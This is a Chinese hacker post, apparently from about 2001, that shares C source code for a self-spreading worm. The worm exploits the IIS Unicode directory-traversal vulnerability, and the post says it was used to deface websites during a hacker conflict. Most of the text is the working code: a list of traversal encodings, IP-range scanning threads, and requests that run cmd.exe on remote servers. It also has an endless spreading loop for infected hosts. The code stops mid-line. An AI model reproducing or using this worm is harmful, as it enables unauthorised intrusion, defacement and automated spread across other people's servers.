扫描UNICODE漏洞传播、攻击的蠕虫源代码

在5.1期间的中美黑客战中，红客联盟攻击的网站中，WINDOWS+IIS+UNICODE漏洞主机占90%。（美国的poizenBOx同样是利用这个UNICODE漏洞攻击我国的主机）

详细请见http://www.cnhonker.com/whatnew/data/20010418/214346.htm

下面是我和zhaowuqing写的一个利用该漏洞的蠕虫程序。跟LION蠕虫有些相象，都需要把自己寄存到某个FTP主机上、、、、、、

运行：直接运行（无参数）将扫描本机IP开始的100个主机，并修改首页、传播

带参数运行 ：iis 202.97.233.0 202.97.233.254  这将扫描该IP段的主机并实施攻击。

下面贴源代码

file://Don't forget to link with wsock32.lib :-o
#include <windows.h>
#include <stdio.h>

file://定义常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
MaxThread=100;//最大开100个线程扫描
file://下面定义漏洞数组
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};

file://下面7个漏洞出现的目录，可以自己定义更多，但务必修改后改下面的for循环数字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};

file://声明函数
long GetLocalIP(void);//获得本机IP
DWORD WINAPI FindExeDir(LPVOID lp);//找到可执行目录
char *GetData(int SockFD);//获取SEND返回的数据
char * find(const char*pszSource,const char * pszKey);//在返回数据中查找指定字符串

char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径

file://程序入口

int main(int argc, char **argv)
{
 HANDLE hThread=NULL;
 DWORD dwThreadID;
    long PreviousCount;
 int i;
 int StartNet;
 int StopNet;
 int StartHost;//IP段开始
 int StopHost;//IP段结束
 
 WSADATA wsaData;
 struct in_addr host;
 
 WSAStartup(0x202, &wsaData );
 if(argc<2)//无参数运行的时候扫描本机IP开始的100个主机
 {
  StartNet=GetLocalIP();
  StopNet=GetLocalIP()+100;
 }
 else//参数iis 202.97.56.3 202.97.56.254这种方式，取参数作为IP段
 {
  StartNet=inet_addr(argv[1]);
  StopNet=inet_addr(argv[2]);
 }
 StartHost=ntohl(StartNet);
 StopHost=ntohl(StopNet);
 WSACleanup();
    do
 {
  
  host.S_un.S_addr = inet_addr(argv[1]);
  WSAStartup(0x202, &wsaData );
  
  hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
  if(hSemaphore==NULL)
  {
   
   printf("CreateSemaphore failed:%d",GetLastError());
   file://__leave;
  }
  
  for(i=StartHost;i<=StopHost;i++)
  {
   hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
   if(hThread==NULL)
    
   {
    printf("Create thread failed:%d",GetLastError());
    break;
   }
   printf(".");
   Sleep(10);
   CloseHandle(hThread);
   WaitForSingleObject(hSemaphore,INFINITE);
  }
  while(1)
  {
   WaitForSingleObject(hSemaphore,INFINITE);
   if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
   {
    printf("main() ReleaseSemaphore failed:%d",GetLastError());
    Sleep(5000);
    break;
   }
   if(PreviousCount==(MaxThread-1))
   {
    printf("All done.");
    break;
   }
   Sleep(500);
  }
  
  printf("发现可执行目录. [%s]", exedir);
  printf("可执行目录是 [%s]",localpath);
  
  
  CloseHandle(hSemaphore);
  
  WSACleanup();
  
  
 }
    while(argc<2);//无参数运行，既在被黑主机上运行,死循环
 
 return 0;
}

long GetLocalIP(void)
{
 char  szName[128];
 int i;
 PHOSTENT pHost;
 gethostname(szName, 128);
 printf("%s",szName);
 pHost = gethostbyname(szName);
 if( NULL == pHost )// failed
  return 0;
 for(i=0;pHost->h_addr_list[i]!=NULL;i++)
  printf("%s",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
 return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}

DWORD WINAPI FindExeDir(LPVOID lp)
{
 int host=(int)lp;
 u_short port=80;
 int SockFD,i;
 struct sockaddr_in DstSAin;
 char waste[500],uniwaste[500];
 char *buffer,*p;
 char space[3];
 char dletter[2];//磁盘路径
 char asc[3];
 int rbytes=0,loc1=0,loc2=0;
 char locdir[300];
 int exenum=0;
crack: 
 memset(locdir,0,300);
 memset(uniwaste,0,499);
 memset(space,0,3);
 strcpy(space,"%20");
 memset(asc,0,3);
 strcpy(asc,"%3E");
 printf("查找漏洞%d...",host);
 
 for(i=0;i<8;i++)
 {
  strcat(uniwaste,"..");
  strcat(uniwaste,hole[num]); file://把unicode码和URL结合起来.
 }
 
 memset(waste,0,500);
 file://create our string that sees if we can execute cmd.exe
 file://that way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
 sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0",ExeDirs[exenum],uniwaste,space);
 SockFD=socket(AF_INET,SOCK_STREAM,0);
 DstSAin.sin_family = AF_INET;
 DstSAin.sin_port = htons(port);
 DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
 if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
 {
  printf("Trying directory [%s]", waste);
  send(SockFD,waste,strlen(waste),0); file://try one of the directories
  buffer=GetData(SockFD);
  p=strstr(buffer,"Directory of"); file://找到了cmd.exe的目录！！！
  if(p!=NULL)
  {
   
   loc1=p-buffer+1;
   p=strstr(buffer,"<DIR>");
   if(p!=NULL)
   {
    loc2=p-buffer+1;
    loc2=loc2-27;
    buffer[loc2-2]='